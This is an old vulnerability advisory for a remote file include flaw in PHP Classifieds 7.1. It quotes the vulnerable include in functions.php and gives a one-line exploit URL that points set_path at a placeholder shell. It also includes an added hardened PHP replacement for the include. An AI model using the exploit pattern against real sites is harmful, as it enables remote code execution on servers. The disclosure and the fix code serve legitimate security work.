Securityvulns SECURITYVULNS:DOC:14763
Oct 21, 2006 - 12:00 a.m.

PHP Classifieds 7.1 - Remote File Include Vulnerability

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PHP Classifieds 7.1 - Remote File Include Vulnerability

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Download : http://softadmin.deltascripts.com/download_get.php?id=32

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bug in : functions.php

Vuln Code :

include($set_path . '/admin/htmlMimeMail/htmlMimeMail.php');

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit :

www.site.com/[path]/functions.php?set_path=|SH3LL|?
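
A hardened form of the include shown above, as an added example that is not part of the original advisory or the vendor's code. It assumes $set_path can be set from the request (as the URL above implies) and that functions.php sits in the application root; APP_ENTRY is a hypothetical constant that the legitimate entry scripts would define.

```php
<?php
// Added example: hardened replacement for the include in functions.php.
// Assumption: functions.php sits in the application root, so the mail
// library lives at <root>/admin/htmlMimeMail/htmlMimeMail.php.

// 1. Refuse direct HTTP requests to a library file. APP_ENTRY is a
//    hypothetical constant that the real entry scripts would define
//    before including functions.php.
if (!defined('APP_ENTRY')) {
    http_response_code(403);
    exit('Direct access not permitted');
}

// 2. Derive the base path from this file's own location, never from
//    request data. Any request-supplied $set_path is overwritten here.
$set_path = __DIR__;

// 3. Resolve the target and confirm it is still inside the base
//    directory before including it.
$mailer = realpath($set_path . '/admin/htmlMimeMail/htmlMimeMail.php');
if ($mailer === false
    || strpos($mailer, $set_path . DIRECTORY_SEPARATOR) !== 0) {
    error_log('functions.php: mail library missing or outside base path');
    exit('Configuration error');
}

require_once $mailer;
```

Keeping allow_url_include = Off in php.ini (the default since PHP 5.2) adds a second layer by rejecting URL wrappers in include and require.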

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by : Le CoPrA

Mail To : Le.CoPrA (at) hotmail (dot) com

Special Greetz FlYinG 2 || LovER BoY ||

Greetz4// alkasrgolden,3theaby geer Mohajer22, Qaher, Saudi HaCkRz, Black-Code, kOnDoR, AsbMay,HACKERS PAL, simo64, MR.wolF,Abdullah-00, cRiMiNaL NeT,020,Dark-Man, Dr.ExE ,egyptghost,KaBaRa,ToOoFA

Channel : wWw.TrYaG.cOm/vb WwW.D4Eg.orG WwW.kOnDoR4.Com/vb

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=